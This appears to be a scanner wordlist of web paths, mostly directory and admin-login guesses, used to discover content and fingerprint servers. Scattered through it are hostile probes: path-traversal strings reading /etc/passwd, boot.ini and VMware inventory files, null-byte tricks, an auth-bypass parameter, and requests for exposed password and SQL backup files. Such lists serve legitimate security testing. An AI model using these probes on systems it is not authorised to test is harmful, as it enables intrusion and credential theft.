/notes/,/noticias/,/NSearch/,/objects/,/odbc/,/officescan/,/ojspdemos/,/old_files/,/oldfiles/
/ocsreports/,/vbseo.php,/forum/,/forums/,/smf/,/phpbb/,/manager/,/admin.php,/admin/
/officescan/console/html/cgi/cgiChkMasterPwd.exe,/officescan/console/html/ClientInstall/officescannt.htm,/officescan/console/html/images/icon_refresh.gif,/picts/BC_bwlogorev.gif,/picts/menu_leaf.gif,/theme/images/en/login1.gif,/,/NessusClient.swf
/old/,/oprocmgr-service/,/oprocmgr-status/,/oracle/,/oradata/,/order/,/orders/,/os/,/out/
/outgoing/,/owners/,/ows-bin/,/page/,/_pages/,/pages/,/partner/,/partners/,/passport/
/pages/admin/admin-login.cfm,/admincp/index.cfm,/admincp/login.cfm,/admin_area/admin.cfm,/admin_area/login.cfm,/moderator/login.cfm,/administrator/login.cfm,/moderator.cfm
/panel-administracion/,/instadmin/,/memberadmin/,/administratorlogin/,/adm/,/admin/account.php,/admin/index.php,/admin/login.php,/admin/admin.php
/password/,/passwords/,/path/,/payment/,/payments/,/pccsmysqladm/,/PDG_Cart/,/perl5/,/perl/
/personal/,/pforum/,/phorum/,/phpBB/,/php_classes/,/phpclassifieds/,/php/,/phpimageview/,/phpnuke/
/phpmy-admin/,/mysqladmin/,/mysql-admin/,/websql/,/_phpmyadmin/,/footer1.gif,/homepage.nsf/homePage.gif?OpenImageResource,/icons/ecblank.gif
/phpMyAdmin-2.2.6/,/phpMyAdmin-2.5.1/,/phpMyAdmin-2.5.4/,/phpMyAdmin-2.5.5-rc1/,/phpMyAdmin-2.5.5-rc2/,/phpMyAdmin-2.5.5/,/phpMyAdmin-2.5.5-pl1/,/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/,/phpMyAdmin-2.5.6/,/phpMyAdmin-2.5.7/,/phpMyAdmin-2.5.7-pl1/,/phpMyAdmin-2.6.0-alpha/,/phpMyAdmin-2.6.0-alpha2/,/phpMyAdmin-2.6.0-beta1/,/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/,/phpMyAdmin-2.6.0-rc2/,/phpMyAdmin-2.6.0-rc3/,/phpMyAdmin-2.6.0/,/phpMyAdmin-2.6.0-pl1/,/phpMyAdmin-2.6.0-pl2/,/phpMyAdmin-2.6.0-pl3/,/phpMyAdmin-2.6.1-rc1/,/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/,/phpMyAdmin-2.6.1-pl1/,/phpMyAdmin-2.6.1-pl2/,/phpMyAdmin-2.6.1-pl3/,/phpMyAdmin-2.6.2-rc1/,/phpMyAdmin-2.6.2-beta1/,/phpMyAdmin-2.6.2/,/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.3/,/phpMyAdmin-2.6.3-rc1/,/phpMyAdmin-2.6.3-pl1/,/phpMyAdmin-2.6.4-rc1/,/phpMyAdmin-2.6.4-pl1/,/phpMyAdmin-2.6.4-pl2/,/phpMyAdmin-2.6.4-pl3/,/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4-pl1/libraries/grab_globals.lib.php
/phpMyAdmin-2.6.4/,/phpMyAdmin-2.7.0-beta1/,/phpMyAdmin-2.7.0-rc1/,/phpMyAdmin-2.7.0-pl1/,/phpMyAdmin-2.7.0-pl2/,/phpMyAdmin-2.7.0/,/phpMyAdmin-2.8.0-beta1/,/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/,/phpMyAdmin-2.8.0/,/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/,/phpMyAdmin-2.8.0.3/,/phpMyAdmin-2.8.0.4/,/phpMyAdmin-2.8.1-rc1/,/phpMyAdmin-2.8.1/,/phpMyAdmin-2.8.2/,/sqlmanager/,/php-myadmin/
/PHPMyAdmin/,/PMA/,/pma/,/dbadmin/,/myadmin/,/php-my-admin/,/phpMyAdmin2/,/phpMyAdmin-2/,/phpMyAdmin-2.2.3/
/phpPhotoAlbum/,/phpprojekt/,/phpSecurePages/,/pics/,/pictures/,/pike/,/piranha/,/pls/
/pictures/buttons/file_view_mark.gif,/cpqlogin.htm?RedirectUrl=/&RedirectQueryString=,/hplogo.gif,/ie_index.htm,/ilo.gif,/images/icon_server_connected.gif,/mxhtml/images/signin_logo.gif,/mxhtml/images/status_critical_15.gif
/plsql/,/plssampleadmin_/,/plssampleadmin/,/plssampleadmin_help/,/plssample/,/poll/,/polls/,/porn/,/portal/
/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00,/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234,/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20,/d41d8cd98f00b204e9800998ecf8427e.php,/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0,/rom-0,/Telerik.Web.UI.DialogHandler.aspx?dp=////
/portals/,/postgres/,/postnuke/,/ppwb/
/printer/,/printers/,/privacy/,/privado/,/_private/,/private/,/priv/,/prod/
/projectserver/,/protected/,/proxy/,/prueba/,/pruebas/,/prv/,/pub/,/_public/,/public/
/projectserver/Tasks/Taskspage.asp,/exchweb/bin/auth/owalogon.asp,/images/outlook.jpg,/owa/8.1.375.2/themes/base/lgntopl.gif,/owa/,/tsweb/,/reportserver/,/
/publica/,/publicar/,/publico/,/publish/,/purchase/,/purchases/,/pw/,/python/,/random_banner/
/qcbcjcaqojamsdmt
/rdp/,/Readme/,/recycler/,/registered/,/register/,/registry/,/remote/,/remove/,/report/
/reports/,/reseller/,/restricted/,/retail/,/reveal/,/reviews/,/ROADS/,/robot/,/robots/
/rest/applinks/1.0/manifest,/jira/rest/applinks/1.0/manifest,/secure/rest/applinks/1.0/manifest,/rest/servicedeskapi/info,/jira/rest/servicedeskapi/info,/secure/rest/servicedeskapi/info,/rest/applinks/1.0/manifest,/confluence/rest/applinks/1.0/manifest
/restoreinfo.cgi,/confirminvite.php,/sourcebans/,/swfupload/index.php,/mymarket/shopping/index.php,/myshop_start.php,/piranha/secure/passwd.php3,/cgi-bin/ck/mimencode,/cgi-bin/masterCGI?
/root/,/rsrc/,/ruby/,/sales/,/save/,/script/,/ScriptLibrary/,/scripts/,/search/
/samples/,/mono/1.1/index.aspx,/login/,/login.htm,/login.jsp,/test.asp,/test.class,/test/,/test.htm
/samples/messagebroker/http
/samples/messagebroker/httpsecure
/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml
/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E//etc/vmware/hostd/vmInventory.xml
/sdk/../../../../../../../etc/vmware/hostd/vmInventory.xml
/sdk/../../../../../..//etc/vmware/hostd/vmInventory.xml
/search-ui/,/sec/,/secret/,/secured/,/secure/,/security/,/sell/,/server/,/server-info/
/servers/,/server_stats/,/serverstats/,/server-status/,/service/,/services/,/servicio/,/servicios/,/servlet/
/servlets/,/session/,/setup/,/shared/,/sharedtemplates/,/share/,/shell-cgi/,/shipping/,/shop/
/setupweb.nsf,/setup.nsf,/smbcfg.nsf,/smconf.nsf,/smency.nsf,/smhelp.nsf,/smmsg.nsf
/shopper/,/show/,/SilverStream/,/siteadmin/,/site/,/sitemgr/,/siteminderagent/,/siteminder/
/siteadmin/login.aspx,/siteadmin/index.aspx,/account.jsp,/admin/index.jsp,/admin/login.jsp,/admin/admin.jsp,/admin_area/admin.jsp,/admin_area/login.jsp
/sitecore/admin/stats.aspx,/sitecore/admin/unlock_admin.aspx,/sitecore/shell/Applications/shell.xml,/sitecore/admin/ShowConfig.aspx,/App_Config/Security/Domains.config.xml,/App_Config/Security/GlobalRoles.config.xml,/sitecore%20modules/staging/service/api.asmx,/sitecore%20modules/staging/workdir
/sitecore/system/Settings/Security/Profiles
/siteserver/,/sites/,/sitestats/,/siteupdate/,/smreports/,/smreportsviewer/,/soapdocs/,/soap/,/software/
/skins/default/images/roundcube_logo.png,/manifest.json,/archive/flash:home/html/images/Cisco_logo.gif,/Default?MAIN=DEVICE,/TopAccess/images/RioGrande/Rio_PPC.gif,/jwsappmngr.jnlp,/nfdesktop.jnlp,/nfservlets/servlet/SPSRouterServlet/
/smquar.nsf,/smsolar.nsf,/smtime.nsf,/smtpibwq.nsf,/smtpobwq.nsf,/smtp.box,/smtp.nsf,/smvlog.nsf
/solaris/,/source/,/sql/,/squid/
/src/,/srchadm/,/ssi/,/ssl/,/sslkeys/,/staff/,/state/,/stat/,/statistic/
/srvnam.htm,/statmail.nsf,/statrep.nsf,/stauths.nsf,/stautht.nsf,/stconfig.nsf,/stconf.nsf,/stdnaset.nsf,/stdomino.nsf
/statistics/,/stats-bin-p/,/stats/,/stats_old/,/status/,/storage/,/StoreDB/,/store/
/stlog.nsf,/streg.nsf,/stsrc.nsf,/userreg.nsf,/vpuserinfo.nsf,/webadmin.nsf,/web.nsf,/.nsf/../winnt/win.ini,/icons/ecblank.gif
/storemgr/,/stronghold-info/,/stronghold-status/,/stuff/,/style/,/styles/,/stylesheet/,/stylesheets/,/subir/
/sun/,/super_stats/,/supplier/,/suppliers/,/supply/,/supporter/,/support/,/sysadmin/,/sysbackup/
/sys/,/system/,/systems/,/tar/,/target/,/tarjetas/,/tech/,/technote/,/te_html/
/system/login/reset?next=%2Fsystem%2Flogin&set-lang=en,/common/images/logos/img_logoMain.jpg,/Dashboard/Dashboard.html
/system/user/scn_user_list
/Telerik.Web.UI.DialogHandler.ashx?dp=////,/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=////,/uir//etc/passwd,/uir//tmp/csman/0,/cgi-bin/export_debug_msg.exp,/cgi-bin/config.exp,/,/readme.html,/
/temp/,/template/,/templates/,/temporal/,/test-cgi/,/testing/,/tests/,/testweb/,/themes/
/templates/beez/css/template_rtl.css,/CHANGELOG.txt,/,/pix/moodlelogo.gif,/admin/environment.xml,/typo3/index.php,/typo3/README.txt,/t3lib/README.txt
/templates1/view_product.php,/escort-profile.php,/pages/indexheader.php,/pages/searcher.php,/pages/indexviewentry.php,/tinymcpuk/filemanager/browser.html,/admin/libraries/ajaxfilemanager/ajaxfilemanager.php,/leftmenubody.php
/test.html,/test.php,/test.txt,/webmail/,/mail/,/log/,/log.htm,/log.php,/log.asp
/ticket/,/tickets/,/tip/,/tips/,/tmp/,/ToDo/,/tool/,/tools/,/TopAccess/
/tiny_mce/plugins/filemanager/,/upload/scp/ajax.php,/cgi-mod/view_help.cgi,/cgi-mod/index.cgi,/cgi-mod/smtp_test.cgi,/TopToolArea.html,/switchSystem.html,/intruvert/jsp/module/Login.jsp
/top/,/tpv/,/trabajo/,/track/,/tracking/,/transfer/,/transito/,/transpolar/,/tree/
/trac/,/lime/,/survey/,/limesurvey/,/openvbx/,/getsimple/,/ecoder/,/cmspages.php,/sc_webcat/ecat/cms_view.php
/trace/,/heapdump/,/jolokia/,/vmware/,/vmware/imx/vmware_boxes-16x16.png,/ui/,/ui/imx/vmwareLogo-16x16.png,/ui/imx/vmwarePaperBagLogo-16x16.png,/ui/vManage.do
/trees/,/trick/,/tricks/,/u02/,/unix/,/unknown/,/updates/,/upload/,/uploads/
/typo3/sysext/t3skin/images/login/typo3logo-white-greyback.gif,/squirrelmail/src/login.php,/webmail/src/login.php,/src/login.php,/squirrelmail/images/sm_logo.png,/webmail/images/sm_logo.png,/,/program/
/updown.php,/modules/docmanager/doctypetemplates/myuploadedfile,/ReqWebHelp/advanced/workingSet.jsp,/dhost/,/engine/api/api.class.php,/jsft_resource.jsf,/scales_static_resource.jsf,/setup/password_required.html
/upload_multiple_js.php,/uploadtester.asp,/info.php,/phpinfo.php,/kusabax/manage_page.php,/plus/lurking.php,/adm/barra/assetmanager/assetmanager.php,/eyeos/
/usage/,/userdb/,/user/,/users/,/us/,/usr/,/ustats/,/usuario/,/usuarios/
/usuarios.sql,/bdb.sql,/1.sql,/admin/download/backup.sql,/clientaccesspolicy.xml,/atom/,/atom.aspx,/atom.php
/util/,/utils/,/vendor/,/vfs/,/view/,/vpn/,/vti_txt/,/w2000/,/w2k/
/v/,/w/,/x/,/y/,/z/,/acceso/,/access/,/accesswatch/,/acciones/,/account/
/vhosts/ehcp/?op=applyfordomainaccount,/tools_admin.cgi?,/level/15,/exec/show/log/CR,/level/15/exec/-/configure/http,/level/15/exec/-,/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report,/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report
/vpn/images/AccessGateway.ico,/citrix/AccessPlatform/auth/clientscripts/,/AccessPlatform/auth/clientscripts/,/Citrix//AccessPlatform/auth/clientscripts/cookies.js,/Citrix/AccessPlatform/auth/clientscripts/login.js,/Citrix/PNAgent/config.xml,/cgi-bin/image/shikaku2.png,/config/public/usergrp.gif
/w3perl/,/w-agora/,/way-board/
/web/
/web800fo/,/webaccess/,/webadmin/,/webAdmin/,/webalizer/,/webapps/,/WebBank/,/webboard/
/webadmin/admin.cfm,/user.cfm,/controlpanel.cfm,/moderator/admin.cfm,/cp.cfm,/admin-login.cfm,/admin/admin-login.cfm,/admin/home.cfm,/adm1n/
/webadmin/index.asp,/webadmin/admin.asp,/webadmin/login.asp,/admin/admin_login.asp,/admin_login.asp,/panel-administracion/login.asp,/adminLogin.asp,/admin/adminLogin.asp
/WebCalendar/,/webcart/,/webcart-lite/,/webcgi/,/webdata/,/webdav/,/webdb/,/webDB/,/web/
/webimages2/,/webimages/,/web-inf/,/webmaster/,/webmaster_logs/,/webMathematica/,/webpub/,/webpub-ui/,/webreports/
/webline/html/agent/default/badlogin.jhtml,/callme/callForm.jhtml,/webline/html/multichatui/nowDefunctWindow.jhtml,/browserId/wizard.jhtml,/admin/CiscoAdmin.jhtml,/msccallme/mscCallForm.jhtml,/webline/html/admin/wcs/LoginPage.jhtml
/webreps/,/webshare/,/WebShop/,/website/,/webstat/,/webstats/,/Web_store/,/webtrace/,/WebTrend/
/webtrends/,/web_usage/,/win2k/,/window/,/windows/,/win/,/winnt/,/word/,/work/
/wiki/,/mediawiki/,/Mediawiki/,/MediaWiki/,/wordpress/
/wiki/rest/applinks/1.0/manifest,/rest/applinks/1.0/manifest,/bitbucket/rest/applinks/1.0/manifest,/rest/applinks/1.0/manifest,/bamboo/rest/applinks/1.0/manifest,/rest/applinks/1.0/manifest,/crowd/rest/applinks/1.0/manifest,/x_logo.gif
/world/,/wsdocs/,/WS_FTP/,/wstats/,/wusage/,/www0/,/www2/,/www3/,/www4/
/wp-includes/js/scriptaculous/sound.js,/wp-includes/js/jquery/suggest.js,/wp-includes/images/blank.gif,/wp-includes/js/comment-reply.js,/wp-includes/js/codepress/codepress.js,/wp-login.php,/wordpress/wp-login.php,/blog/wp-login.php
/wp-login.php
/wtegsjozvgsi
/www/,/wwwjoin/,/wwwrooot/,/www-sql/,/wwwstat/,/wwwstats/,/xGB/,/xml/,/XSL/
/wwwlog/,/wwwlogs/,/mail_log_files/,/images/rails.png,/mono/,/robots.txt,/crossdomain.xml,/css/cake.generic.css,/img/cake.icon.gif
/xtemp/,/xymon/,/zb41/,/zipfiles/,/zip/,/_docs/,/sitecore/shell/sitecore.version.xml,/sitecore/login/default.aspx
/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../dev/null%00
/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/zp-core/,/amember/,/.hgignore,/.gitignore,/.bzrignore,/debug.seam,/CSS/Miniweb.css,/S7Web.css,/Portal0000.htm
/\../\../\../boot.ini
/_4dm1n/,/_adm1n/,/_Admin/,/system_administration/,/system-administration/,/system-admin/,/system-admins/,/system-administrators/
/_api/version,/_layouts/images/helpicon.gif,/Pages/Default.aspx,/PublishingImages/NewsArticleImage.jpg,/_admin/operations.aspx,/_app_bin,/_controltemplates,/_layouts
/_layouts/viewlsts.aspx,/forms/allitems.aspx,/forms/webfldr.aspx,/forms/mod-view.aspx,/forms/my-sub.aspx,/pages/categoryresults.aspx,/categories/viewcategory.aspx,/sitedirectory
/_plugin/fckeditor/editor/filemanager/connectors/test.html,/html/news_fckeditor/editor/filemanager/upload/php/upload.php,/fckeditor/editor/filemanager/connectors/test.html,/admin/includes/FCKeditor/editor/filemanager/upload/test.html,/uploadsnaps.php,/upload/includes/js/files/upload.php,/tinybrowser/upload.php
/_vti_bin/_vti_aut/author.exe,/_vti_bin/_vti_aut/dvwssr.dll,/_vti_bin/_vti_adm/admin.dll,/_vti_bin/_vti_adm/admin.exe,/_vti_bin/fpcount.exe?Page=default.asp|Image=3,/_vti_bin/shtml.dll,/_vti_bin/shtml.exe,/_vti_pvt/_x_todo.htm
/_vti_pvt/access.cnf,/_vti_pvt/administrator.pwd,/_vti_pvt/administrators.pwd,/_vti_pvt/authors.pwd,/_vti_pvt/bots.cnf,/_vti_pvt/botinfs.cnf,/_vti_pvt/deptodoc.btr,/_vti_pvt/doctodep.btr
/_vti_pvt/frontpg.lck,/_vti_pvt/linkinfo.cnf,/_vti_pvt/service.cnf,/_vti_pvt/service.grp,/_vti_pvt/service.lck,/_vti_pvt/service.pwd,/_vti_pvt/Service.stp,/_vti_pvt/services.cnf
/_vti_pvt/services.org,/_vti_pvt/structure.cnf,/_vti_pvt/svcacl.cnf,/_vti_pvt/users.pwd,/_vti_pvt/uniqueperm.cnf,/_vti_pvt/writeto.cnf,/.svn/,/.svn/text-base/.htaccess.svn-base
/_vti_pvt/_x_todoh.htm
?feed=rss,?feed=rss2,?feed=atom,/feed,/feed/,/feed/rss,/feed/rss2,/feed/atom,/wp-includes/images/rss.png
@localhost
index.html?../../../../../boot.ini
index.html?..\..\..\..\..\boot.ini
\\..%2f..%2f..%2f..%2fboot.ini%
